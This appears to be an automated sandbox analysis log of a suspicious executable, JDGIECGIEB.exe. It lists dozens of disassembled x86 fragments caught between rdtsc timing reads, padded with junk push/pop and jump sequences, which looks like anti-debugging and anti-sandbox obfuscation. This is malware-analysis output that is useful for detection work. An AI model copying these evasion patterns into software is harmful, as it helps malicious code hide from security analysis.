Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 331221 second address: 331250 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4465131BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F4465131BD2h 0x00000010 js 00007F4465131BC6h 0x00000016 jo 00007F4465131BC6h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4465131BCBh 0x00000023 jo 00007F4465131BC6h 0x00000029 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 334101 second address: 334107 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 334107 second address: 3341E5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jbe 00007F4465131BD0h 0x0000000f nop 0x00000010 jng 00007F4465131BD7h 0x00000016 push 00000000h 0x00000018 mov edi, 72E9E73Dh 0x0000001d push 5B00A2B2h 0x00000022 pushad 0x00000023 pushad 0x00000024 jmp 00007F4465131BD1h 0x00000029 jp 00007F4465131BC6h 0x0000002f popad 0x00000030 ja 00007F4465131BC8h 0x00000036 push ebx 0x00000037 pop ebx 0x00000038 popad 0x00000039 xor dword ptr [esp], 5B00A232h 0x00000040 jmp 00007F4465131BCAh 0x00000045 push 00000003h 0x00000047 mov ecx, dword ptr [ebp+122D1DF2h] 0x0000004d push 00000000h 0x0000004f add cx, 3672h 0x00000054 push 00000003h 0x00000056 stc 0x00000057 push 6A667213h 0x0000005c pushad 0x0000005d jnp 00007F4465131BC8h 0x00000063 jmp 00007F4465131BD3h 0x00000068 popad 0x00000069 add dword ptr [esp], 55998DEDh 0x00000070 lea ebx, dword ptr [ebp+12448FDEh] 0x00000076 mov esi, dword ptr [ebp+122D3966h] 0x0000007c or esi, dword ptr [ebp+122D3BD2h] 0x00000082 xchg eax, ebx 0x00000083 ja 00007F4465131BD4h 0x00000089 jmp 00007F4465131BCEh 0x0000008e push eax 0x0000008f jnp 00007F4465131BD4h 0x00000095 push eax 0x00000096 push edx 0x00000097 pushad 0x00000098 popad 0x00000099 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 334230 second address: 334269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp], eax 0x00000008 jmp 00007F44646ECA50h 0x0000000d push 00000000h 0x0000000f call 00007F44646ECA49h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F44646ECA53h 0x0000001c rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 334269 second address: 334282 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 334282 second address: 3342D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F44646ECA46h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jnc 00007F44646ECA60h 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jnp 00007F44646ECA4Eh 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 push edx 0x00000021 push ebx 0x00000022 jmp 00007F44646ECA4Dh 0x00000027 pop ebx 0x00000028 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3342D4 second address: 3342F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BCCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jmp 00007F4465131BCDh 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3342F9 second address: 334311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F44646ECA54h 0x00000009 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 334311 second address: 334315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 334315 second address: 33436F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F44646ECA48h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 push 00000003h 0x00000025 mov edx, dword ptr [ebp+122D39EEh] 0x0000002b push 00000000h 0x0000002d mov ch, 46h 0x0000002f mov ecx, 0B8F5166h 0x00000034 push 00000003h 0x00000036 mov ecx, dword ptr [ebp+122D3C36h] 0x0000003c push 4EFF0337h 0x00000041 push eax 0x00000042 push edx 0x00000043 ja 00007F44646ECA4Ch 0x00000049 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 33436F second address: 3343BF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4465131BCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 7100FCC9h 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F4465131BC8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b mov edx, dword ptr [ebp+122D2C2Dh] 0x00000031 mov edi, dword ptr [ebp+122D3926h] 0x00000037 lea ebx, dword ptr [ebp+12448FE7h] 0x0000003d movzx edx, ax 0x00000040 mov cl, dl 0x00000042 xchg eax, ebx 0x00000043 push ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3343BF second address: 3343D0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F44646ECA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3343D0 second address: 3343D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3343D7 second address: 3343E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F44646ECA46h 0x0000000a rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 334452 second address: 334456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 33451B second address: 334567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F44646ECA4Bh 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c push ecx 0x0000000d pushad 0x0000000e jmp 00007F44646ECA53h 0x00000013 jnl 00007F44646ECA46h 0x00000019 popad 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jne 00007F44646ECA57h 0x00000027 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 334567 second address: 33459A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 sbb edx, 4979BE05h 0x0000000f lea ebx, dword ptr [ebp+12448FF2h] 0x00000015 sub dword ptr [ebp+122D27A0h], esi 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d pushad 0x0000001e jbe 00007F4465131BC6h 0x00000024 jng 00007F4465131BC6h 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d je 00007F4465131BC6h 0x00000033 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3544DA second address: 3544E4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F44646ECA52h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3544E4 second address: 3544EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35248B second address: 352491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 352491 second address: 352495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 352495 second address: 3524A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3524A1 second address: 3524A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3524A5 second address: 3524A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3525BF second address: 3525F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4465131BD4h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4465131BCBh 0x00000012 jmp 00007F4465131BD0h 0x00000017 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 352894 second address: 352898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 352898 second address: 3528C1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jc 00007F4465131BC6h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop edi 0x00000012 popad 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jnc 00007F4465131BC6h 0x0000001c jmp 00007F4465131BCDh 0x00000021 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3528C1 second address: 3528CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3528CB second address: 3528DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4465131BCFh 0x00000009 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 352B4A second address: 352B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 352B50 second address: 352B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 352B58 second address: 352B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35337E second address: 353384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 353384 second address: 353388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 353388 second address: 35338E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35338E second address: 3533C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F44646ECA5Fh 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F44646ECA4Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3533C4 second address: 3533D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4465131BCEh 0x00000009 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 347AEF second address: 347AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F44646ECA46h 0x0000000a rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 347AF9 second address: 347B30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BCDh 0x00000007 jmp 00007F4465131BCCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jmp 00007F4465131BD6h 0x00000014 push edi 0x00000015 pop edi 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 347B30 second address: 347B64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA54h 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop eax 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F44646ECA51h 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 347B64 second address: 347B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 347B6B second address: 347B71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 347B71 second address: 347B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 347B75 second address: 347B91 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F44646ECA4Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F44646ECA46h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 321FF0 second address: 321FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 321FF4 second address: 322008 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F44646ECA4Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 322008 second address: 322010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35CDA9 second address: 35CDAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35CDAD second address: 35CDB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35D3A1 second address: 35D3B2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35D3B2 second address: 35D3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35D3B7 second address: 35D3BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35D3BC second address: 35D3C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35D3C2 second address: 35D3CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35BCB8 second address: 35BCBD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35BCBD second address: 35BCCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35BCCB second address: 35BCD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F4465131BC6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35BCD5 second address: 35BCD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35D519 second address: 35D51E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35D51E second address: 35D54D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F44646ECA50h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e jl 00007F44646ECA4Ch 0x00000014 je 00007F44646ECA46h 0x0000001a pop ecx 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f push ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35D6CC second address: 35D6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 361F92 second address: 361F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 36152F second address: 361537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 361537 second address: 361552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F44646ECA52h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 361C5E second address: 361C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 361C64 second address: 361C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F44646ECA57h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 361C86 second address: 361C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 361DEB second address: 361E34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA53h 0x00000007 jmp 00007F44646ECA4Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f jmp 00007F44646ECA53h 0x00000014 jmp 00007F44646ECA4Fh 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363D7A second address: 363D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363D7E second address: 363D82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363D82 second address: 363D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363E66 second address: 363E70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363E70 second address: 363EA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jno 00007F4465131BDBh 0x00000011 mov eax, dword ptr [eax] 0x00000013 jnp 00007F4465131BD8h 0x00000019 push eax 0x0000001a push edx 0x0000001b jnp 00007F4465131BC6h 0x00000021 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363EA6 second address: 363EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363EAA second address: 363ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F4465131BDAh 0x00000012 jmp 00007F4465131BD4h 0x00000017 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363ED0 second address: 363F27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007F44646ECA50h 0x0000000f call 00007F44646ECA49h 0x00000014 jmp 00007F44646ECA57h 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c je 00007F44646ECA4Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363F27 second address: 363F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363F2B second address: 363F44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F44646ECA55h 0x00000009 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363F44 second address: 363F60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363F60 second address: 363F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363F64 second address: 363F72 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4465131BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 363F72 second address: 363FB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007F44646ECA4Ah 0x0000000f jnc 00007F44646ECA5Dh 0x00000015 jmp 00007F44646ECA57h 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 pop eax 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
